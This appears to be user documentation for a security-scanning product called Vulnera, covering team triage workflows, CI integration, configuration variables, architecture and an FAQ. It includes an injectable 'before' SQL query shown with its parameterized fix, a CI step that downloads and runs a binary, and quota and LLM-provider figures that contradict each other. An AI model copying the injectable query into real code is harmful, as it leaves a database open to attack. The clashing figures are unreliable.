Scan runs (uses shared quota)
↓
Results available to all members
↓
Security team reviews findings
↓
Developer addresses findings
↓
Findings marked resolved
↓
Historical record kept for audit
Practical Example:
-
Developer Alice runs scan on
/backend:vulnera auth login --api-key $ORG_API_KEY # (org key, not personal) vulnera analyze ./backend --all-modules -
Security lead Bob reviews findings in dashboard:
- Open scan → Filter by Critical/High severity
- Add comments to findings
- Mark false positives
- Create Jira tickets for issues
-
Developer Alice gets Slack notification:
- “New critical finding in backend scan”
- She clicks link → opens dashboard
- Sees Bob’s comments and tickets
- Fixes code locally
-
Alice re-runs scan after fix:
- Same findings now show as “Resolved”
- Historical comparison shows before/after
Code Review Integration
GitHub PR workflow with Vulnera:
-
Setup GitHub Integration (Admin):
- Settings → Integrations → GitHub
- Authorize Vulnera app
- Enable “Auto-scan PRs”
-
Developer opens PR:
- GitHub automatically triggers Vulnera scan
- Results appear as PR status check
-
Security review:
- PR blocked if critical issues found
- Vulnera comment on PR with findings
- Link to full dashboard for details
- Developer can request security review
-
Resolution:
- Developer pushes fix commit
- Vulnera automatically re-scans
- If clean, PR check passes
- Can now merge to main
Example GitHub PR Comment:
🚨 Vulnera Security Scan Found Issues
Critical (1):
- SQL Injection in /src/api/users.py:45
CVSS: 9.2
High (2):
- Hardcoded API key in config.py:12
- Missing input validation in POST /api/data:78
View full report: [Dashboard Link]
Bot action: This PR is blocked until issues are resolved
Finding Management
Assigning Findings
Assign to Team Member:
- Open scan → select finding
- Click Assign To
- Search member by email or name
- Member gets notification:
- Email: “You’ve been assigned a critical finding”
- Slack: Link to finding with severity
- In-app: Shows in “Assigned to Me” queue
My Assignments View:
- Dashboard → My Assignments
- Shows all findings assigned to current member
- Sort by severity, due date, project
- Quick filter: Unstarted, In Progress, Blocked
Tracking Remediation
Finding Status Lifecycle:
Open (New)
↓
In Progress (assigned, work started)
↓
Resolved (fix implemented, verified)
OR
False Positive (not a real issue)
OR
Acknowledged (known issue, accepting risk)
Updating Status:
-
Open finding → Status dropdown
-
Select new status
-
Add comment (optional):
- Explain why marked false positive
- Link to fix PR or commit
- Document risk acceptance
-
Members with access see update:
- Slack notification: “@alice marked as Resolved”
- Audit log records change
- Dashboard updates in real-time
Commenting & Discussion
Collaborate on Finding:
- Open finding → scroll to Discussion section
- Click Add Comment
- Type message (Markdown supported)
- @mention team members:
@bobor@security-team - Submit → all mentioned members notified
Example Finding Discussion:
Alice: "This is a security issue in our OAuth implementation"
Bob: "Good catch. I'll check if this affects production"
Charlie: "@bob let's verify in staging first"
Security Lead: "Approved for resolution. PR: #4521"
Threaded Discussions (Enterprise):
- Reply to specific comments
- Resolve/pin important threads
- Export discussion for compliance
Reporting & Analytics
Team Analytics Dashboard
Organization Analytics (Admin view):
Go to Settings → Analytics → Dashboard
View:
- Team quota usage (bar chart: 850/1000 tokens used)
- Usage by member (table: Alice 400 tokens, Bob 300, etc.)
- Usage by module (pie: Dependencies 50%, SAST 35%, Secrets 15%)
- Trend (line graph: last 6 months)
- Busiest project, most findings by type
Shared Reports
Generate Report for Stakeholders:
- Go to Reports → New Report
- Select report type:
- Executive Summary — High-level metrics for leadership
- Detailed Technical — Full findings for security team
- Compliance — SOC2/ISO27001/GDPR aligned
- Department Summary — Findings by team/project
- Configure:
- Date range (last 30 days, last quarter, custom)
- Modules to include (dependencies, SAST, secrets, API)
- Recipients (email, download, or both)
- Click Generate
- Share PDF/HTML with stakeholders
Executive Summary Example:
VULNERA SECURITY REPORT
January 2024
OVERVIEW
Total Vulnerabilities: 247
Critical: 12 | High: 45 | Medium: 120 | Low: 70
TRENDS
↓ 15% fewer critical issues vs. last month
→ Secrets detection improved (5 leaked credentials caught)
↑ Dependencies increased (new packages added)
TEAM PERFORMANCE
Alice: 42 scans, 340 findings reviewed
Bob: 38 scans, 280 findings reviewed
Charlie: 25 scans, 180 findings reviewed
NEXT STEPS
1. Remediate 5 critical issues (ongoing)
2. Update 12 outdated dependencies (in progress)
3. Add 2 new team members for code review capacity
Custom Dashboards (Enterprise)
Create personalized views:
- Go to Organization → Dashboards → Custom
- Select widgets:
- Recent findings
- Team quota gauge
- Trend chart
- Member activity
- CI/CD integration status
- Arrange layout, save as team dashboard
- Share with team members
Security Team Workflows
Daily Security Review Routine
Morning (15 min):
- Check Slack for critical findings overnight
- Review My Assignments dashboard
- Prioritize by severity and project criticality
Mid-day (30 min):
- Comment on findings with remediation guidance
- Assign new findings to developers
- Update status on resolved items
End-of-day (10 min):
- Generate daily summary report
- Check team quota usage (alert if >75%)
- Review newly integrated repositories
Weekly (1 hour):
- All-hands meeting: review weekly findings summary
- Discuss high-priority remediation blockers
- Plan integrations/automation improvements
Escalation Process
When to escalate finding:
- Critical + No Owner Assigned → Assign to team lead immediately
- Finding unresolved 7+ days → Escalate to manager
- Multiple critical findings in same code → Schedule code review session
- Suspicious pattern (e.g., many secrets) → Notify CISO
Escalation in Dashboard:
- Open finding → Mark Escalated
- Add reason:
- High business impact
- Unresponsive team
- Need architecture review
- Escalated findings show in red on analytics
- Leadership dashboard shows escalations count
Developer Workflows
Running Scans as Developer
Individual Contributor:
# Authenticate with org API key
vulnera auth login --api-key $ORG_API_KEY
# Scan your code (uses org quota, not personal)
vulnera analyze ./src --all-modules --format json
# View results (or use dashboard)
vulnera analyze ./src --all-modules --format sarif | jq '.findings[] | {location, message, severity}'
Pre-commit Scanning:
-
Install hook:
vulnera install-hook ./ -
Hook runs before commit, blocks if critical:
$ git commit Vulnera scan in progress... 2 critical findings detected. Commit blocked. Fix and retry: git commit
CI/CD Integration:
In .github/workflows/security.yml:
name: Security Scan
on: [push, pull_request]
jobs:
vulnera-scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run Vulnera scan
env:
VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
run: |
curl -L https://releases.vulnera.studio/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera
./vulnera analyze . --all-modules --format sarif > vulnera.sarif
- name: Upload SARIF to GitHub
uses: github/codeql-action/upload-sarif@v2
with:
sarif_file: vulnera.sarif
Understanding & Fixing Findings
When you get assigned a finding:
-
Notification (Slack, email, dashboard)
- Click link → opens finding details
-
Understand the Issue
- Read vulnerability explanation
- Look at affected code snippet
- Review CVSS score and severity
- Check provided remediation guidance
-
Research if Needed
- Follow linked CVE/CWE
- Check if it affects your use case
- Ask security team for context (@bob in dashboard)
-
Fix or Dismiss
- If real issue: Create fix branch, implement patch, commit
- If false positive: Mark as such in dashboard with reason
- If acceptable risk: Mark as “Acknowledged” (with manager approval)
-
Verify
- Re-run scan locally:
vulnera analyze ./ - Finding should disappear or show as resolved
- Create PR with fix
- Vulnera auto-scans PR → shows as clean
- Re-run scan locally:
-
Mark Complete
- PR merged → Vulnera marks finding resolved
- Or manually: Dashboard → Finding → Status → Resolved
Example Finding Workflow:
Finding: SQL Injection in /api/users.py:45
Severity: Critical
CVSS: 9.2
Developer reads:
"User input is concatenated directly into SQL query without parameterization"
Developer fixes:
```python
# Before
query = f"SELECT * FROM users WHERE id = {user_id}"
# After
query = "SELECT * FROM users WHERE id = $1"
db.execute(query, [user_id])
Developer re-scans → Finding gone → PR merged
Dashboard shows: “Resolved by commit abc123def”
## Cross-Team Collaboration
### Developer + Security Team
**Weekly Sync Meeting:**
1. **Agenda** (30 min):
- Review critical findings from past week
- Discuss blockers (unclear requirements, false positives)
- Prioritize next week's work
- Demo fixes and improvements
2. **Before Meeting**:
- Security team prepares findings summary (generated report)
- Developers review assigned items in dashboard
- Both teams note questions
3. **After Meeting**:
- Document decisions in dashboard comments
- Update remediation timeline
- Send summary email to stakeholders
### DevOps + Security Team
**Infrastructure Scanning:**
1. **DevOps** sets up cloud scanning:
```bash
vulnera analyze s3://our-bucket --all-modules
vulnera analyze github-repos --org acme-corp --all-modules
-
Security reviews infrastructure findings:
- Cloud misconfigurations
- Exposed credentials in configs
- Vulnerable dependencies in infra code
-
DevOps fixes issues:
- Updates IaC templates (Terraform, CloudFormation)
- Re-scans to verify
- Dashboards show infrastructure security posture
Security Team + Leadership
Monthly Executive Report:
-
Generate Compliance Report:
- Go to Reports → Compliance Reports → SOC2
- Select past month
- Download PDF
-
Include in Board Deck:
- Overview of findings trend
- Team remediation velocity
- Risk metrics and KPIs
- Budget/quota efficiency
-
Dashboard Access for Leadership:
- Create Viewer accounts for executives
- Give read-only access to reports
- They can view trends without modifying findings
Notifications & Alerts
Configuring Team Notifications
Central Configuration (Admin):
- Go to Settings → Notifications
- Set for entire team:
- Critical findings: Immediate Slack alert
- High findings: Daily digest email
- Quota alerts: At 75%, 90%, 100%
- Member activity: Weekly summary
Personal Preferences (Member):
- Go to Profile → Notification Preferences
- Member can override:
- Frequency (real-time, daily digest, weekly summary)
- Channel (email, Slack, in-app, SMS)
- Finding types (all, critical only, assigned only)
Slack Channel Strategy
Setup Channels:
#vulnera-critical— Real-time critical findings (mention team lead)#vulnera-security— All findings, daily summary (team discussion)#vulnera-alerts— Quota warnings, integration issues (ops only)#vulnera-ci— PR scan results, CI/CD integration logs (read-only bot)
Slack Automation Example:
@vulnera-bot configure
├── #vulnera-critical: severity >= critical
├── #vulnera-security: summary daily 9 AM
├── #vulnera-alerts: quota > 90%
└── #vulnera-ci: all GitHub PR scans
Performance Metrics
Key Metrics to Track
Team Health:
- Remediation Rate — % of findings fixed within SLA
- Mean Time to Remediation (MTTR) — Days from finding to resolved
- False Positive Rate — % of dismissed as not real issue
- Scan Frequency — Scans per week by team
Security Posture:
- Critical Findings Trend — Month-over-month comparison
- Dependency Age — Average age of dependencies
- Secret Exposures — Count of exposed credentials (should be zero)
- Coverage — % of repositories being scanned
Quota Efficiency:
- Tokens/Finding — Cost per vulnerability found
- Scans/Token — How many scans per token used
- Team Quota Burndown — Days until month-end quota exhausted
Monthly Review Template
Run this monthly:
- Export analytics report (Settings → Analytics → Export)
- Calculate metrics above
- Create 1-page summary:
- Headline: metrics vs. last month
- Key wins: critical issues resolved
- Blockers: findings taking too long
- Next month priorities
- Share with team + leadership
Best Practices
Team Organization
✅ Small Team (5 members):
- 1 Security lead (Admin)
- 4 Developers (Members)
- Shared single quota pool
- Daily Slack updates
✅ Medium Team (15 members):
- 1-2 Security leads (Admin)
- 10-12 Developers (Member)
- 2-3 Managers (Viewer)
- Department-specific Slack channels
✅ Large Organization (50+ members):
- Hierarchical teams (Enterprise)
- Custom RBAC roles
- Department quotas
- Cross-team steering committee
Communication Best Practices
✅ Do:
- Comment on findings with context (not just “fix this”)
- Mention developers in Slack for urgent issues
- Have weekly syncs (async updates via dashboard)
- Document decisions in finding comments
- Celebrate resolved critical findings
❌ Don’t:
- Assign findings without explanation
- Ignore escalated issues
- Let findings sit unreviewed >5 days
- Resolve without verification
- Skip audit log reviews
Security Practices
✅ Do:
- Use organization API keys, not personal keys
- Rotate API keys quarterly
- Enable 2FA for all members
- Audit member list monthly
- Export compliance reports quarterly
- Review webhook logs
❌ Don’t:
- Share API keys in chat/email
- Use shared email addresses
- Keep inactive members in org
- Disable audit logging
- Store findings in plaintext
- Ignore unreviewed scans
Common Scenarios
Scenario 1: Onboarding New Developer
- Admin invites developer with Member role
- Developer accepts invite
- DevOps provides org API key
- Developer authenticates:
vulnera auth login --api-key - Developer runs first scan:
vulnera analyze ./ - Security team reviews findings, comments with guidance
- Developer receives Slack notification, fixes issues
- Next scan shows issues resolved
Timeline: 30 minutes total
Scenario 2: Critical Finding in Production Code
- Vulnera detects critical SQL injection in production branch
- Slack alert goes to
#vulnera-critical(pings team lead) - Security lead opens dashboard, verifies severity
- Security lead assigns to Alice (code owner) with comment: “URGENT: Fix before merge”
- Alice gets Slack notification, sees 9.2 CVSS score
- Alice creates hotfix branch, implements parameterized query
- Alice commits fix, GitHub auto-scans PR (Vulnera)
- Dashboard shows finding now marked “Resolved”
- Alice creates PR, security approves, code merged
- Production release includes fix
Timeline: 2-4 hours
Scenario 3: Monthly Compliance Reporting
- Security lead runs report: Reports → Compliance → SOC2 → January
- Report generated: PDF with audit log, member actions, findings summary
- Security lead emails report to CISO, board
- CISO reviews with dashboard (Viewer access)
- Sends to auditor for compliance verification
Timeline: 10 minutes to generate, 1 hour to review
Troubleshooting
Q: Team member not seeing organization scans
A: 1. Verify member accepted invitation (check email)
2. Confirm member role is not Viewer
3. Have member log out/log back in
4. Clear browser cache
5. Check if member was removed (Settings → Audit Log)
Q: Findings not appearing in Slack
A: 1. Verify Slack integration enabled (Settings → Integrations)
2. Check notification triggers configured
3. Verify Vulnera app still has channel permissions
4. Test webhook: Settings → Webhooks → Test
5. Check Slack app hasn't been uninstalled from workspace
Q: Team member assigned findings but didn’t respond
A: 1. Verify notification settings (Settings → Notifications)
2. Member may have disabled email notifications
3. Send direct Slack message if urgent
4. Escalate to manager if blocking
5. Consider reassigning if no response in 3 days
Q: How to handle team member leaving?
A: 1. Remove member (Settings → Members → Remove)
2. Revoke their API keys immediately
3. Reassign their open findings to other members
4. Export their scan history (for audit/compliance)
5. Review audit log for any suspicious activity
Next Steps
- Set Up Slack — Enable real-time alerts for your team
- Create Weekly Sync — Calendar recurring meeting to review findings
- Generate First Report — Monthly compliance or executive summary
- Document Workflows — Create team runbook for common scenarios
For dashboard features, see Dashboard Guide. For organization setup, see Organization Management.
Need help? Email support@vulnera.studio or visit our FAQ.
Configuration Reference
This page documents all configuration options for Vulnera.
Environment Variables
All configuration can be set via environment variables with the VULNERA__ prefix using double underscores for nesting.
Core Settings
| Variable | Description | Default |
|---|---|---|
DATABASE_URL | PostgreSQL connection string | Required |
VULNERA__AUTH__JWT_SECRET | JWT signing secret (32+ chars) | Required |
VULNERA__SERVER__ADDRESS | Server bind address | 0.0.0.0:3000 |
VULNERA__SERVER__ENABLE_DOCS | Enable Swagger UI | true |
LLM Configuration
Vulnera supports multiple LLM providers for AI-powered features.
Provider Selection
| Variable | Description | Default |
|---|---|---|
VULNERA__LLM__PROVIDER | Active provider: google_ai, openai, azure | google_ai |
VULNERA__LLM__DEFAULT_MODEL | Model name for generation | gemini-2.0-flash |
VULNERA__LLM__TEMPERATURE | Generation temperature (0.0-1.0) | 0.3 |
VULNERA__LLM__MAX_TOKENS | Maximum tokens to generate | 2048 |
VULNERA__LLM__TIMEOUT_SECONDS | Request timeout | 60 |
VULNERA__LLM__ENABLE_STREAMING | Enable streaming responses | true |
Google AI (Gemini)
| Variable | Description |
|---|---|
GOOGLE_AI_KEY | API key from aistudio.google.com |
VULNERA__LLM__GOOGLE_AI__BASE_URL | Custom API endpoint |
Recommended models: gemini-2.0-flash, gemini-1.5-pro
OpenAI
| Variable | Description |
|---|---|
OPENAI_API_KEY | API key from platform.openai.com |
VULNERA__LLM__OPENAI__BASE_URL | Custom endpoint (for Ollama, vLLM, etc.) |
VULNERA__LLM__OPENAI__ORGANIZATION_ID | Organization ID |
Recommended models: gpt-4, gpt-4-turbo, gpt-3.5-turbo
Azure OpenAI
| Variable | Description |
|---|---|
AZURE_OPENAI_KEY | Azure API key |
VULNERA__LLM__AZURE__ENDPOINT | Azure resource endpoint |
VULNERA__LLM__AZURE__DEPLOYMENT | Deployment name |
VULNERA__LLM__AZURE__API_VERSION | API version (default: 2024-02-15-preview) |
Resilience Settings
| Variable | Description | Default |
|---|---|---|
VULNERA__LLM__RESILIENCE__ENABLED | Enable circuit breaker + retry | true |
VULNERA__LLM__RESILIENCE__MAX_RETRIES | Max retry attempts | 3 |
VULNERA__LLM__RESILIENCE__INITIAL_BACKOFF_MS | Initial backoff delay | 500 |
VULNERA__LLM__RESILIENCE__MAX_BACKOFF_MS | Maximum backoff delay | 30000 |
VULNERA__LLM__RESILIENCE__CIRCUIT_BREAKER_THRESHOLD | Failures before circuit opens | 5 |
VULNERA__LLM__RESILIENCE__CIRCUIT_BREAKER_TIMEOUT_SECS | Seconds before circuit recovery | 60 |
Enrichment Settings
| Variable | Description | Default |
|---|---|---|
VULNERA__LLM__ENRICHMENT__MAX_FINDINGS_TO_ENRICH | Max findings to enrich | 10 |
VULNERA__LLM__ENRICHMENT__MAX_CONCURRENT_ENRICHMENTS | Concurrent enrichment calls | 3 |
VULNERA__LLM__ENRICHMENT__INCLUDE_CODE_CONTEXT | Include code in prompts | true |
VULNERA__LLM__ENRICHMENT__MAX_CODE_CONTEXT_CHARS | Max code snippet length | 2000 |
Sandbox Configuration
The sandbox provides secure isolation for SAST and secrets detection modules.
| Variable | Description | Default |
|---|---|---|
VULNERA__SANDBOX__ENABLED | Enable sandboxing | true |
VULNERA__SANDBOX__BACKEND | Sandbox backend (see below) | landlock |
VULNERA__SANDBOX__FAILURE_MODE | Sandbox setup behavior | best_effort |
VULNERA__SANDBOX__EXECUTION_TIMEOUT_SECS | Execution timeout | 30 |
VULNERA__SANDBOX__MEMORY_LIMIT_MB | Memory limit (process backend) | 256 |
Sandbox Backends
| Backend | Description | Requirements |
|---|---|---|
landlock | Kernel-level isolation | Linux 5.13+ |
auto | Auto-detect best backend | Linux/non-Linux |
process | Fork-based isolation | Any Linux |
noop | Disable sandboxing | Not recommended |
Landlock provides near-zero overhead security using Linux kernel capabilities.
Failure modes:
| Mode | Behavior |
|---|---|
best_effort | Continue analysis if sandbox setup degrades |
fail_closed | Abort module execution if sandbox setup fails |
Cache Configuration
| Variable | Description | Default |
|---|---|---|
VULNERA__CACHE__DRAGONFLY_URL | Redis/Dragonfly URL | Optional |
VULNERA__CACHE__DEFAULT_TTL_SECS | Default cache TTL | 3600 |
Example Configuration
Minimal (Development)
DATABASE_URL='postgresql://localhost/vulnera'
VULNERA__AUTH__JWT_SECRET='dev-secret-key-at-least-32-chars!'
GOOGLE_AI_KEY='your-api-key'
Production
DATABASE_URL='postgresql://user:pass@db.example.com:5432/vulnera'
VULNERA__AUTH__JWT_SECRET='production-secret-minimum-32-chars!'
VULNERA__CACHE__DRAGONFLY_URL='redis://cache.example.com:6379'
# LLM
VULNERA__LLM__PROVIDER='google_ai'
GOOGLE_AI_KEY='your-production-key'
VULNERA__LLM__RESILIENCE__ENABLED=true
# Sandbox
VULNERA__SANDBOX__ENABLED=true
VULNERA__SANDBOX__BACKEND='landlock'
VULNERA__SANDBOX__FAILURE_MODE='best_effort'
# Server
VULNERA__SERVER__ENABLE_DOCS=false
VULNERA__SERVER__CORS_ORIGINS='https://vulnera.studio'
System Architecture (Advanced Reference)
This section provides technical details about Vulnera’s architecture for developers, integrators, and operators who need deeper understanding.
Overview
Vulnera is a modular, async Rust platform using domain-driven design (DDD) principles with a composition root wiring pattern.
┌─────────────────────────────────────────────────────────────┐
│ HTTP Server │
│ (Axum Web Framework) │
└──────────────────────────┬──────────────────────────────────┘
│
┌──────────────────────────┴──────────────────────────────────┐
│ Orchestrator │
│ (Async Job Queue + Module Registry) │
├───────────────┬──────────────┬─────────────┬────────────────┤
│ │ │ │ │
▼ ▼ ▼ ▼ ▼
Dependencies SAST Secrets API LLM
Analysis Analysis Detection Analysis Explanations
(Node deps) (AST rules) (ML models) (OpenAPI) (Pangu)
Layered Architecture
Vulnera follows domain-driven design with four layers:
1. Domain Layer
Pure types, entities, traits—zero side effects
module.rs—AnalysisModuletrait (all modules implement)errors.rs— Domain error typesfindings.rs— Finding entity and value objectsconfig.rs— Configuration value objectsrepository.rs— Repository trait definitions
Key traits:
AnalysisModule— All modules (deps, SAST, secrets, API, LLM) implement thisIRepository— Abstract data accessICache— Cache abstraction (Dragonfly/Redis only)IAuthenticator— Authentication logic
2. Application Layer
Use cases orchestrating domain logic
create_analysis_job.rs— Initialize analysis jobexecute_analysis_job.rs— Run analysis modulesenrich_findings_with_llm.rs— Add LLM explanations- Repository implementations for data access
Key characteristics:
- Specific use cases (business logic)
- Coordinates between domain and infrastructure
- Returns domain entities (not DTOs)
3. Infrastructure Layer
HTTP clients, database queries, file I/O, parsers
database/— SQLx compile-time validated SQL queriesparsers/— AST parsing, manifest parsersapi_clients/— NVD, GHSA, GitHub, Pangu LLM clientscache/— Dragonfly/Redis caching, compressionauth/— JWT and API key handling
Key characteristics:
- All external communication
- Wrapped with circuit breakers and retry logic
- Configurable via
Configstruct
4. Presentation Layer
Controllers, routes, DTOs
controllers/— HTTP handlersmodels.rs— Request/response DTOs with OpenAPI annotationsroutes.rs— Route registration
Module System
The Five Analysis Modules
Each implements AnalysisModule trait:
- Dependencies — Package registry lookups (OSV, NVD, GHSA)
- SAST — AST-based code analysis (tree-sitter)
- Secrets — ML pattern + entropy detection
- API — OpenAPI 3.x specification analysis
- LLM — Google Gemini API for explanations/fixes
Module Selection (Rule-Based)
Input: /path/to/project
├─ package.json found → Run Dependencies
├─ .py/.js files found → Run SAST (language-specific)
├─ All files scanned → Run Secrets
├─ openapi.yaml found → Run API
└─ All findings → Optionally enrich with LLM
Data Flow: Full Analysis Job
HTTP POST /api/v1/analyze/job
│
├─→ [Auth middleware] ← Validate API key or JWT
│
├─→ [Rate limiter] ← Check quota (token-based)
│
├─→ [Create job use case]
│ ├─ Validate input
│ ├─ Create Job in database
│ └─ Push to Dragonfly job queue
│
├─→ [Worker pool] (async, configurable max_job_workers)
│ ├─ Dequeue job
│ ├─ Download/access source (git, S3, local)
│ ├─ Detect project type → Module selector
│ ├─ Run selected modules in parallel
│ │ ├─ Dependencies: concurrent registry lookups
│ │ ├─ SAST: concurrent file analysis
│ │ ├─ Secrets: concurrent file scanning
│ │ └─ API: parse OpenAPI spec
│ ├─ Aggregate findings
│ └─ Persist to database
│
└─→ Return: Job ID + status (or stream if still processing)
Concurrency Model
Tokio async runtime with configurable thread pools:
[analysis]
max_job_workers = 8 # Worker pool size
max_concurrent_packages = 8 # Per-job package lookups
max_concurrent_registry_queries = 10
max_concurrent_api_calls = 12
Concurrency impact:
- Without concurrency: 50 packages → 50 × 2s = 100 seconds
- With 8 concurrent workers: 50 packages → 6-12 seconds
- With caching: 50 packages (50% cached) → 3-6 seconds
Cache Architecture
Two-level caching with Dragonfly/Redis:
L1: In-Memory (100MB, 5-min TTL, optional compression)
↓ (miss)
L2: Dragonfly/Redis (24-hour TTL, 10KB compression threshold)
↓ (miss)
External: OSV, NVD, GHSA, GitHub, Pangu LLM APIs
Configuration:
[cache]
ttl_hours = 24
l1_cache_size_mb = 100
l1_cache_ttl_seconds = 300
enable_cache_compression = true
compression_threshold_bytes = 10240
dragonfly_url = "redis://127.0.0.1:6379"
Rate Limiting & Quota System
Token-based quota with Dragonfly backend:
GET request: 1 token
POST request: 2 tokens
Analysis operation: 3 tokens
LLM operation: 6 tokens
Tiers:
- Unauthenticated: 10 tokens/day
- API Key: 40 tokens/day
- Organization: 48 tokens/day (shared)
Daily reset: UTC midnight
Database Schema
PostgreSQL 12+ with SQLx compile-time validation:
Key tables:
users— User accounts, authenticationorganizations— Team/organization groupingorganization_members— Role-based membershippersisted_job_results— Analysis findings (JSONB)api_keys— SHA256-hashed API keyssubscription_limits— Quota tracking
Authentication & Authorization
JWT Flow
- User registers/logs in → JWT issued (httpOnly cookie)
- Middleware extracts JWT on each request
- Validates signature + expiry
- Injects user context into request
API Key Flow
- User creates API key → Returns one-time (never shown again)
- Stored as SHA256 hash in database
- Each request: Lookup hash, verify, use associated user
RBAC (Role-Based Access Control)
- Owner: Full access, billing, member management
- Admin: Create jobs, manage members, view analytics
- Analyst: Create jobs, view results, comment
- Viewer: View-only access
Security Model
Defense in depth:
- HTTPS + HSTS
- CORS (configurable allowed_origins)
- CSRF tokens (POST/PUT/DELETE)
- Rate limiting (stricter for auth endpoints)
- Input validation (SQLx prevents SQL injection)
- Output encoding (JSON serialization)
- No secrets in logs (sensitive fields marked)
Configuration System
Strongly-typed with environment overrides:
config/default.toml (defaults)
↓
Environment variables (override)
↓
Config struct (passed to services)
Pattern: VULNERA__SECTION__KEY=value
Example: VULNERA__AUTH__JWT_SECRET=mysecret
Composition Root
Single entry point: src/app.rs
All services instantiated and wired:
1. Load config
2. Connect to external services (DB, cache, APIs)
3. Instantiate analysis modules
4. Register modules in ModuleRegistry
5. Spawn worker pool
6. Return OrchestratorState (passed to handlers)
Key principle: Never instantiate services inside module internals. Everything flows through OrchestratorState.
Performance Characteristics
Analysis speed (typical):
| Module | Time | Depends On |
|---|---|---|
| Secrets | 100ms/file | File size |
| SAST | 500ms/file | File complexity |
| API | 50ms/spec | Spec size |
| Dependencies | 1-10s/package | Registry latency |
| LLM | 1-5s/request | Pangu API latency |
Deployment Models
Docker
FROM rust:1.91 AS builder
# Build Vulnera binary...
FROM debian:bookworm
COPY --from=builder /vulnera /usr/bin/
EXPOSE 3000
CMD ["vulnera"]
Kubernetes
- Stateless API servers (replicate horizontally)
- Shared PostgreSQL database
- Shared Dragonfly cache
- Shared job queue (Dragonfly)
Scaling Considerations
Horizontal: Add API server instances behind load balancer (all stateless)
Vertical: Tune max_job_workers and max_concurrent_* settings
Resource limits:
- Memory: ~500MB base + job-dependent (~100MB per concurrent job)
- CPU: Event-driven, peaks during concurrent analysis
- Disk: Cache compression reduces storage
For More Information
- Analysis Capabilities — What each module does
- API Specification — Endpoint reference
- Configuration Guide — Tuning parameters
Orchestrator Observability Architecture
This document defines the observability architecture for the orchestration pipeline from job creation through module execution and lifecycle persistence.
Goals
- Make orchestration failures actionable in production.
- Preserve request/job context across async boundaries.
- Keep logging structured and queryable.
- Minimize hidden failure modes in state transitions.
Scope
Applies to:
CreateAnalysisJobUseCaseExecuteAnalysisJobUseCaseJobWorkflow- Worker execution path in
job_queue
Design Principles
-
Context at boundaries
- Every public use-case/workflow entrypoint must emit structured context at start and finish.
- Required identifiers:
job_id,project_id,module, and transition target when applicable.
-
Error locality
- Failures should be logged as close as possible to their source with operation-specific metadata.
- Callers should receive typed errors; logs carry operational detail.
-
State-machine visibility
- Every job transition (
Pending -> Queued -> Running -> Completed/Failed/Cancelled) must be visible in logs with reason and timing.
- Every job transition (
-
Async fan-out accountability
- Parallel module execution logs should expose:
- module spawn
- module completion/failure
- aggregate completion counts
- Parallel module execution logs should expose:
-
No panic paths in orchestration
- Runtime errors should not panic in production paths.
Event Model
Job Lifecycle Events
job.lifecycle.enqueuejob.lifecycle.startjob.lifecycle.completejob.lifecycle.failjob.lifecycle.cancel
Suggested fields:
job_idproject_idstatus_fromstatus_toreasonduration_ms(where applicable)
Module Execution Events
job.module.spawnjob.module.completejob.module.errorjob.module.panic(unexpected task panic)
Suggested fields:
job_idmoduleduration_mserror
Instrumentation Strategy
- Use
#[instrument]on public async orchestration methods. - Use
infofor lifecycle milestones. - Use
warnfor degraded-but-continued paths. - Use
errorfor failed operations and panics. - Include elapsed timing at operation boundaries for coarse latency tracking.
Operational Outcomes
With this architecture, operators can answer:
- Which phase is failing most often?
- Which module frequently exceeds expected runtime?
- Which jobs failed due to transition/persistence errors vs module logic?
- How long jobs spend in each phase.
Future Extensions
- Export spans to OpenTelemetry collector.
- Add metrics counters/histograms aligned with event model.
- Correlate webhook delivery outcomes with lifecycle events.
Frequently Asked Questions (FAQ)
Quick answers to common questions about Vulnera’s features, capabilities, and usage.
Quota & Rate Limiting
How much does analysis cost in tokens?
Each operation consumes tokens from your daily quota:
| Operation | Cost |
|---|---|
| Basic analysis | 3 tokens |
| LLM explanation | 6 tokens |
| Code fix generation | 6 tokens |
| LLM query | 6 tokens |
Example: A full analysis (3) + 2 LLM features (12) = 15 tokens total.
Reference: Quota & Pricing Guide
What’s the difference between API key tier and organization tier?
| Tier | Daily Limit | Use Case |
|---|---|---|
| Unauthenticated | 10 tokens | Testing, no auth |
| API Key | 40 tokens | Single integration |
| Organization | 48 tokens | Team usage, shared quota |
Team quota pools together: If an org has 5 members, all members share the 48-token daily limit (no per-member quota).
Can I increase my quota?
Yes. Options:
- Organization tier — Upgrade to shared team quota (100 tokens/day)
- Premium plan — Contact vulnera for higher limits
- On-premise — Deploy Vulnera privately with unlimited quota
What happens when I exceed my quota?
You receive a 429 Too Many Requests error:
Quota resets at 00:00 UTC every day.
Offline Capabilities
What can Vulnera analyze offline (without internet)?
| Module | Offline | Notes |
|---|---|---|
| SAST | ✅ Yes | AST pattern matching (Python, JS, Rust) |
| Secrets | ✅ Yes | ML pattern recognition + entropy |
| API | ✅ Yes | OpenAPI schema analysis |
| Dependencies | ❌ No | Requires CVE database |
| LLM | ❌ No | Requires Pangu API |
CLI offline scan:
vulnera analyze --source ./my-project --modules sast,secrets,api
# No internet required
Can I use Vulnera without an internet connection?
Partial. The CLI can run offline scans for SAST, Secrets, and API analysis. Dependency scanning requires internet (to fetch CVE data from registries).
Analysis Accuracy & False Positives
Why do I have false positives in secret detection?
Common causes:
-
Test/example secrets — Hardcoded in docs or tests
- Fix: Mark as
.vulnera-ignoreor use entropy baseline filters
- Fix: Mark as
-
Placeholder values — Keys like
YOUR_API_KEY_HERE- Fix: Entropy score filters exclude most placeholders
-
High-entropy strings — Random tokens in logs
- Fix: Configure entropy thresholds per secret type
False positive rate: <5% for high-confidence secrets (AWS keys, private certs)
Reference: Secrets Detection
How accurate is SAST analysis?
Detection rates:
| Vulnerability | Confidence | False Positives |
|---|---|---|
| SQL Injection | 95-98% | <3% |
| Cross-Site Scripting (XSS) | 93-97% | <4% |
| Command Injection | 92-95% | <5% |
| Hardcoded Secrets | 98%+ | <2% |
Limitation: Cannot detect business logic flaws or complex multi-step attacks .
Why didn’t Vulnera detect a vulnerability I know exists?
Possible reasons:
-
Dynamic code patterns — Code generated at runtime
- SAST analyzes static AST; runtime patterns require dynamic analysis “next step In roadmap”
-
Complex data flow — Multi-step taint chains
- Default taint depth is 3 hops; increase with
--taint-depth=5
- Default taint depth is 3 hops; increase with
-
Custom sanitizers — User-defined security functions not recognized
- Configure in
.vulnera.tomlundersast.custom_sanitizers
- Configure in
-
False negative filtering — Some detections suppressed to reduce noise
- Enable with
--analysis-depth=full
- Enable with
